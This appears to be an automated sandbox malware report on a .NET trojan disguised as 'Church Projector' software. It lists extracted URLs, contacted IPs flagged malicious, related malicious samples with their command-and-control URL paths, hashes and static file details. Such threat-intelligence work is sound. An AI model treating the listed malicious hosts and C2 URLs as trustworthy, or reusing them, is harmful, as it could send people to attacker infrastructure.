http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com | g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp, g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com$d | g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.founder.com.cn/cnH | g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comiona | g1EhgmCqCD.exe, 00000001.00000002.667751786.00000000011E0000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.krcom | g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnr | g1EhgmCqCD.exe, 00000001.00000003.649286426.0000000005B7A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.%s.comPA | explorer.exe, 00000004.00000002.911535792.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.churchsw.org/church-projector-project | g1EhgmCqCD.exe | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.krn | g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sandoll.co.kr | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | g1EhgmCqCD.exe, 00000001.00000002.667858038.00000000029F1000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.comI | g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sakkal.com | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/8 | g1EhgmCqCD.exe, 00000001.00000003.649504763.0000000005B98000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comTC | g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.comnic | g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.churchsw.org/repository/Bibles/ | g1EhgmCqCD.exe | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comu | g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.coma | g1EhgmCqCD.exe, 00000001.00000002.667751786.00000000011E0000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://en.wikip | g1EhgmCqCD.exe, 00000001.00000003.651135793.0000000005B80000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://mollysmulligan.com/8u3b/?DzrXY=Q16 | msiexec.exe, 00000009.00000002.912045913.00000000049E2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn6 | g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comfr | g1EhgmCqCD.exe, 00000001.00000003.649877535.0000000005B65000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | false | |
                                                                            high
                                                                            http://www.sandoll.co.krn-ug1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.goodfont.co.kr-g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            low
                                                                            http://www.founder.com.cn/cnKr4g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown

Contacted IPs

Public

IP               Domain                      Country        Flag  ASN    ASN Name                    Malicious
172.247.179.61   www.anygivenrunday.com      United States  US    40065  CNSERVERS                   true
107.180.51.23    timbraunmusician.com        United States  US    26496  AS-26496-GO-DADDY-COM-LLC   true
34.102.136.180   2000deal.com                United States  US    15169  GOOGLE                      false
184.168.131.241  kayandbernard.com           United States  US    26496  AS-26496-GO-DADDY-COM-LLC   true
198.54.117.216   parkingpage.namecheap.com   United States  US    22612  NAMECHEAP-NET               false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 404135
Start date: 04.05.2021
Start time: 18:38:15
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 44s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: g1EhgmCqCD.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@13/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 8.9% (good quality ratio 7.9%)
• Quality average: 72.8%
• Quality standard deviation: 32.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded IPs from analysis (whitelisted): 52.255.188.83, 92.122.145.220, 204.79.197.200, 13.107.21.200, 104.43.139.144, 13.88.21.125, 20.82.210.154, 52.155.217.156, 2.20.142.210, 2.20.142.209, 20.54.26.129, 92.122.213.194, 92.122.213.247
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time      Type             Description
18:39:09  API Interceptor  2x Sleep call for process: g1EhgmCqCD.exe modified

Joe Sandbox View / Context

IPs

Columns: Match, Associated Sample Name / URL, Detection, Context

172.247.179.61
• letterhead.exe, malicious, context: www.theolivebrand.com/epms/?x4uDfZgH=AEnXnI+4HUxI9CBgyHEJGsyTY82OFbwVnA5/XP0kPzTReL1QVjubBwVJtrf1DvZchgVu&Cj30v=9rJhur7HoF7lOxC
• BL836477488575.exe, malicious, context: www.alergiaalfrio.com/mb7q/?-ZbLpz4=xi8dSD9FPnKR7HLGQvP47booguUCNFFDDwgIBKtYhKV6h2Dpui8G7mnaQgW+bIdx3Yok&3f=Blgp
• BIOTECHPO960488580.exe, malicious, context: www.alergiaalfrio.com/mb7q/?KneXF=xi8dSD9FPnKR7HLGQvP47booguUCNFFDDwgIBKtYhKV6h2Dpui8G7mnaQgWUE4txzagk&pPB=K2MDkxRXyRbTZrrp
• 9VZe9OnL4V.exe, malicious, context: www.chiba-kyujin.com/mjs/?ohoDP=Szrhs8&EzrxBfhH=Dg2+jvPdn+TYhYd/o8GRI/Tb0e+YllzkLIUYrLOAkmcumVCRF9uFS2RXapE/bh4Mx4qx

107.180.51.23
• https://mcclains.ddns.net/solve/UKJCIAOSJDJkksdMMS/customer-IDPP00C789/auth/, malicious

184.168.131.241
• SWIFT 00395_IMG.exe, malicious, context: www.theboundless.life/bbqo/?Rb=M42dVLz8&XB64XbO8=5cE52+XUn5YOw4VrTBFj5Yjg6Bdl2wnKeIdlDky+FVUstW8yNKK8e4wg1M4nQ/djAnNx
• 4GGwmv0AJm.exe, malicious, context: www.politicalnobody.com/.q0os/?action=fbgen&v=110&crc=669
• don.exe, malicious, context: www.montcoimmigrationlawyer.com/uoe8/?Y4plXns=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&BR=cjlpd
• Comand#U0103 de achizi#U021bie PP050321.exe, malicious, context: www.shoprodeovegas.com/xcl/?DVodV=VtxhA2oX1n1prL&aRm4ZbJP=Q4feKhQOcUvJUP8oz4L5oOA8XtI+UFUMw1FgXJ9gQG3EsyP4HUo30rkjHaPboD73BEgI
• O1E623TjjW.exe, malicious, context: www.mojilifenoosa.com/uoe8/?hL3=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqidrZZ92WW4b0bAtNQ==&lN68=VTUTzPuXE25p9L
• product specification.xlsx, malicious, context: www.catherineandwilson.com/uoe8/?3fz=KdZiceDtrkPSh5wICXOYCMhbIwexAutPvfm5ku1h+ZdZhJi6amIzeeuRyyZPsh51ag6xYA==&-Z54yn=EN9puliPkdzp4
• 9DWvynenEDJ11fY.exe, malicious, context: www.presentationmagic.online/hsd/?QFQH4r=1bG8ElMXxJthtncP&qFN41JEh=gbeajf+ETOHEP0PZHUr0sH0pmTI6pJIXyLWb6Ib5oE0X8yNQm9fn6k4Inoesq/tjFe61
• PURCHASE ORDER.exe, malicious, context: www.xn--demirelik-u3a.com/u8nw/?pPB=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThFlMbwfIqHdYGe9kyQ==&Hpq=V6AHiBHXhz5LI4
• ETC-B72-LT-0149-03-AR.exe, malicious, context: www.shoprodeovegas.com/xcl/?0L0tLd=Q4feKhQOcUvJUP8oz4L5oOA8XtI+UFUMw1FgXJ9gQG3EsyP4HUo30rkjHaPboD73BEgI&jFNTjJ=aFNTkJDx
• 493bfe21_by_Libranalysis.exe, malicious, context: www.bodrope.com/8njn/?CTvX=cvRh_lYP&uFNl=Q5lxd4nOV6z6CcdYecjp1LutROUMPU3SQE6azJE1Czw7E14vrt/nRyUCs3zJRvNDQvTm
• krJF4BtzSv.exe, malicious, context: www.smarthealthubclub.com/oerg/?YL0=8pN4l4&r6A=9BaAtcK5xATnUYN0KSqZEziiqzIuiVppJqo/+bNoUNfJehdCQkqUVzs22u6IBE0AgZIm
• MRQUolkoK7.exe, malicious, context: www.ottawahomevalues.info/8u3b/?9rwxC4Lh=xUmcyzOk4AdBu/tilHHAKcZZd7JmKNqhEsoN8UKLLkcB2vFqOaieKULrS5S3/+NfkzmCUnU9lg==&o2=iN68aFPHs
• PO20210429.xlsx, malicious, context: www.abundando.com/8u3b/?Mz=ltx0qfi0x45&WBZXQ8j=VA7b8QnIVeQJLb4vJ/jdAFdrsC+XTLKBbUdPfJTqVxRnd+9E52kRPAdLCgwgRBmqlhQAqg==
• z5Wqivscwd.exe, malicious, context: www.essential.care/f0sg/?9rQPJl=g9LzgpKuBvImk0kG+GJMLFKZevb+pnBUPQILZLjjt7sgNrDsNlImg91PoYPi1VOUwj/O&EzrtFB=4hL05l3xNH1L
• DHL_S390201.exe, malicious, context: www.thevandolly.com/u2gd/?Rnm=XPc43lnxP&IDKPY0x=9TQa0wIlBYwfJDwG2Z9hvZYJBv0iycAFxoKvqpGfSPWIdmtTiS4MQ+I/8YKrwePIIqW4
• SWIFT COPY.exe, malicious, context: www.brad-caroline.com/gnf/?LZhxv=apOpNte8alFpO6vP&7nE4Zlw=g15J7GGOuse5iUv+r/h5g/mBWked130OqUrJnFmD3Jgb0UMGkh9+WkxhJWheCXb3PGqf
• AL-IEDAHINV.No09876543.exe, malicious, context: www.ssssummit.com/uv34/?gjKTUx=6lchmDL0&rnKTobm=WMQTG0rumw6bKas1ntyyM+QsxkhHxu1ZUcBmNY6ij7cyCWSVhqmkPYQs9C/7EVYcnBE0
• letterhead.exe, malicious, context: www.accidentattorneynearme.net/epms/?x4uDfZgH=njiKImUeNemx2H2C1bki9Spb1pz8bRxtrDi2F8yKp6wD2n21irAidQ0QvvZYOXwohy7E&Cj30v=9rJhur7HoF7lOxC
• Updated April SOA.xlsx, malicious, context: www.bookbeachchairs.com/hx3a/?BDH=EBC1Cs7p3SY2xjAhEgLKPc+2rIVZ9PU/AWUwkk97HGSV6MybJ9/jFRm9oMKT03OILBUCjg==&SH6=u2JtglFH
• PO522-100500.xlsx, malicious, context: www.gosunnydale.com/g050/?d488QFPX=o2gTQ9OSopF0Rpofc5ko6zANYJWIJ/VufnZrGO9o/pAUuoJbu+eBnU7CK63iv20XZ5Q9uw==&i4bD=-Z54yn

Domains

Columns: Match, Associated Sample Name / URL, Detection, Context

parkingpage.namecheap.com
• Payment.xlsx, malicious, context: 198.54.117.210
• w73FtMA4ZTl9NFm.exe, malicious, context: 198.54.117.212
• Remittance Advice pdf.exe, malicious, context: 198.54.117.212
• d801e424_by_Libranalysis.docx, malicious, context: 198.54.117.218
• MRQUolkoK7.exe, malicious, context: 198.54.117.212
• REVISED PURCHASE ORDER.exe, malicious, context: 198.54.117.217
• z5Wqivscwd.exe, malicious, context: 198.54.117.218
• AL-IEDAHINV.No09876543.exe, malicious, context: 198.54.117.218
• register.jpg.dll, malicious, context: 198.54.117.217
• 24032130395451.pdf .exe, malicious, context: 198.54.117.218
• PO17439.exe, malicious, context: 198.54.117.215
• pdf Re revised PI 900tons.exe, malicious, context: 198.54.117.216
• YJgdGYWCni.exe, malicious, context: 198.54.117.211
• Passport_ID_jpg.exe, malicious, context: 198.54.117.211
• Taekwang Quote - 210421_001.exe, malicious, context: 198.54.117.211
• Ac5RA9R99F.exe, malicious, context: 198.54.117.218
• SA-NQAW12n-NC9W03-pdf.exe, malicious, context: 198.54.117.218
• 1400000004-arrival.exe, malicious, context: 198.54.117.211
• qmhFLhRoEc.exe, malicious, context: 198.54.117.217
• uNttFPI36y.exe, malicious, context: 198.54.117.216

ASN

Columns: Match, Associated Sample Name / URL, Detection, Context

AS-26496-GO-DADDY-COM-LLC (US)
• TT.exe, malicious, context: 107.180.41.236
• SWIFT 00395_IMG.exe, malicious, context: 184.168.131.241
• 4GGwmv0AJm.exe, malicious, context: 50.62.168.157
• c647b2da_by_Libranalysis.exe, malicious, context: 184.168.131.241
• HAWB AND INV.exe, malicious, context: 107.180.57.119
• Inquiry 05042021.doc, malicious, context: 107.180.43.16
• don.exe, malicious, context: 184.168.131.241
• Comand#U0103 de achizi#U021bie PP050321.exe, malicious, context: 184.168.131.241
• O1E623TjjW.exe, malicious, context: 184.168.131.241
• product specification.xlsx, malicious, context: 184.168.131.241
• 9DWvynenEDJ11fY.exe, malicious, context: 184.168.131.241
• PURCHASE ORDER.exe, malicious, context: 184.168.131.241
• ETC-B72-LT-0149-03-AR.exe, malicious, context: 184.168.131.241
• SecuriteInfo.com.Heur.3869.xls, malicious, context: 192.186.217.35
• SecuriteInfo.com.Heur.3869.xls, malicious, context: 192.186.217.35
• SecuriteInfo.com.Heur.12433.xls, malicious, context: 192.186.217.35
• SecuriteInfo.com.Heur.12433.xls, malicious, context: 192.186.217.35
• Documents_1906038956_974385067.xls, malicious, context: 192.186.217.35
• Documents_1906038956_974385067.xls, malicious, context: 192.186.217.35
• Bill Of Lading & Packing List.pdf.gz.exe, malicious, context: 107.180.44.132
                                                                              CNSERVERSUSdon.exeGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              wMqdemYyHm.exeGet hashmaliciousBrowse
                                                                              • 45.205.61.240
                                                                              letterhead.exeGet hashmaliciousBrowse
                                                                              • 172.247.179.61
                                                                              DRAFT SHIPPING DOCUMENTS.xlsxGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              pending orders0308 D2101002610 pdf.exeGet hashmaliciousBrowse
                                                                              • 172.247.179.59
                                                                              JLqUPrxTza.exeGet hashmaliciousBrowse
                                                                              • 45.93.101.93
                                                                              Swift Copy#0002.exeGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              NdBLyH2h5d.exeGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                              • 23.225.41.92
                                                                              Swift002.exeGet hashmaliciousBrowse
                                                                              • 23.225.197.29
                                                                              jEXf5uQ3DE.exeGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              Purchase Order.xlsxGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              Statement Of account.exeGet hashmaliciousBrowse
                                                                              • 45.205.60.183
                                                                              dot.dotGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              NEW ORDER - BLL04658464.exeGet hashmaliciousBrowse
                                                                              • 154.198.253.11
                                                                              New Order.exeGet hashmaliciousBrowse
                                                                              • 23.225.41.18
                                                                              BL836477488575.exeGet hashmaliciousBrowse
                                                                              • 172.247.179.61
                                                                              B of L - way bill return.exeGet hashmaliciousBrowse
                                                                              • 154.198.253.11
                                                                              SwiftMT103_pdf.exeGet hashmaliciousBrowse
                                                                              • 45.142.156.44
                                                                              Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                              • 154.198.196.146

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g1EhgmCqCD.exe.log
Process: C:\Users\user\Desktop\g1EhgmCqCD.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.6258646097638785
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: g1EhgmCqCD.exe
File size: 665600
MD5: 5551346aa9f251895021b95a2a7cc390
SHA1: acbcecf7599d3c33f6f2a36c0947cfc633d0a406
SHA256: 9e189d8d48a66d2f53c972275642da7cbc8ad51b20f04cf1d592bef360db50cf
SHA512: 35e43a0f2ef1dd2dfaf921d8af3a4f3ef0f4675479d496141358561c84a3b8c8b1a5bd9497fe6c26757d3e6637edab538ac587d73bc6d47e9b90b751abf55ba3
SSDEEP: 12288:62gypDoyIcOKM5r2uA2rUaML6/tsXpeAr9rF2gRGnURucvUkgDavaijBCir:zgypPzOKp4tR/2XpeAr9rFvzu0Z4ir
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V..`..............P.............&=... ...@....@.. ....................................@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x4a3d26
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x60911B56 [Tue May 4 10:00:54 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa3cd40x4f.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x414.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000xa1d2c0xa1e00False0.798448057432data7.63788106715IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xa40000x4140x600False0.287760416667data2.40391345759IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xa60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_VERSION0xa40580x3b8COM executable for DOS

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Version Infos

                                                                              DescriptionData
                                                                              Translation0x0000 0x04b0
                                                                              LegalCopyrightCopyright Felix Jeyareuben 2012
                                                                              Assembly Version2.0.0.0
                                                                              InternalNameOnSerializedAttribute.exe
                                                                              FileVersion2.0
                                                                              CompanyNamewww.churchsw.org
                                                                              LegalTrademarksChurch Software
                                                                              Comments
                                                                              ProductNameChurch Projector
